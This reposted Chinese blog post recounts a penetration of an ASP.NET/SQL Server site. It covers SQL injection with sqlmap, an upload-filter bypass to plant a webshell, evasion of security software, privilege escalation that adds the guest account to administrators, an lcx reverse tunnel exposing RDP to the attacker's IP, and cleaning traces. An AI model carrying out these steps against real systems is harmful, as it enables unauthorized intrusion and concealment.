提權案例(一)滲透某asp.net網站通過sql server數據庫public 提權 思路分享


先羅列出sql server 角色用戶的權限

按照從最低級別角色(bulkadmin)到最高級別角色(sysadmin)的順序進行描述:
1.bulkadmin:這個角色可以運行BULK INSERT語句.該語句允許從文本文件中將數據導入到SQL Server2008數據庫中,為需要執行大容量插入到數據庫的域帳號而設計.
2.dbcreator:這個角色可以創建,更改,刪除和還原任何數據庫.不僅適合助理DBA角色,也可能適合開發人員角色.
3.diskadmin:這個角色用於管理磁盤文件,比如鏡像數據庫和添加備份設備.適合助理DBA
4.processadmin:SQL Server 2008可以同時多進程處理.這個角色可以結束進程(在SQL Server 2008中稱為"刪除")
5.public:有兩大特點:第一,初始狀態時沒有權限;第二,所有數據庫用戶都是它的成員
6.securityadmin:這個角色將管理登錄名及其屬性.可以授權,拒絕和撤銷服務器級/數據庫級權限.可以重置登錄名和密碼
7.serveradmin:這個角色可以更改服務器范圍的配置選項和關閉服務器
8.setupadmin:為需要管理聯接服務器和控制啟動的存儲過程的用戶而設計.
9.sysadmin:這個角色有權在SQL Server 2008 中執行任何操作.

第一步先找到了網站的新聞頁通過aspx 后綴結尾 判斷 基本信息   windows系統 ,數據庫可能是mssql

嘗試 id=1/0   報語法錯誤  410     /應用程序種的服務器錯誤....  顯而易見是mssql 數據庫 並且存在sql注入   

第二步 再去查他的ip以及網站信息  發現只是地方服務器 沒有大廠商的雲服務器判斷不存在雲waf (如果有ip被封了可以換代理ip) 可以直接上工具

第三步  直接sqlmap 跑出表和數據 角色權限public自定義的很低     繼續信息收集

第四步  發現前台沒什么可利用的信息  先寫腳本爬蟲 得到網站基本目錄 和資源存放地址和一些規則   在上御劍掃描沒什么有用信息

第五步  還可以利用強大的搜索引擎  利用google hack 語法 搜索試試  site:  *.xxx.com 登錄    成功搜索到后台地址

第六步  打開頁面地址 通過和前台規則比對 確認是后台地址    輸入sqlmap 獲取用戶名信息登錄上去

第七步 尋找上傳點找到select 選擇框的上傳功能 但發現只能上傳db 文件  其他文件后綴會自動修改   認真整理他的邏輯 在進入上傳點前一個一面

有url 請求   type=db   審查元素發現  select選擇框 內 option 元素 <value=db>  <value=txt>  由此可以確定他的邏輯  通過選擇框來選擇執行上面邏輯和確認上傳格式文件  直接篡改 成asa (aspx被禁止了)  成功上傳  

第八步  發現上傳成功沒有回顯無法確定路徑和文件名 但是選擇img type上傳后回顯 可以確定上傳目錄 通過圖片命名格式 img201509246518.png  可以猜測命名規則  img 是類型   2015.. 是今天日期 后面可能是當前時間戳   我只需要確定后門的時間戳就行了  寫個js腳本發送10次上傳木馬的請求 同時記錄請求時間   通過第1次 時間 和第10次 時間 相減 得到 的時間區間 有十個馬  通過遍歷這個區間 成功得到相應的就是馬的地址

第九步 打開大馬查看組件 發現 cmd 和net  組件都被刪了 探測后台進程有服務端的安全狗   通過大馬上傳net,cmd 組件到有執行權限的目錄 比如當前的回收站    執行systeminfo 得到打的補丁數 只有4個   上傳免殺pr 利用內存溢出直接提權 把來賓用戶設置密碼加入管理員組

 第十步  輸入 netatst -ano  發現80端口並不是原地址 有監聽地址  通過查詢發現他是個內網地址 可以確認通過外網把內網的80端口做了映射  上傳lcx 做端口轉發   本機執行 lcx -listen 3000   3388 監聽 3000 映射到3388  端口     webshell 機子上執行 -slave  我的ip  3000 192.xxx (內網ip)  3389    轉發到我的3000端口  本機打開遠程連接 輸入  127.0.0.1:3388  輸入剛剛修改密碼的來賓用戶  連接webshell 的機子  完美控制    。

第十一步  清理痕跡退出 把漏洞提交到漏洞平台。

對此站滲透的思考

1.可以直接利用掃描工具 wvs appscan webinspect jsky 極光等

2. 對結果就行定向滲透測試

3.shell 方法  上傳,包含,命令執行,備份。

4.提權先看打了什么補丁  在看安裝的第三方應用    通過ms漏洞提權 和應用提權

5.在擁有webshell 情況下 利用lcx 端口轉發突破內網限制 

6.信息收集很重要

  


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM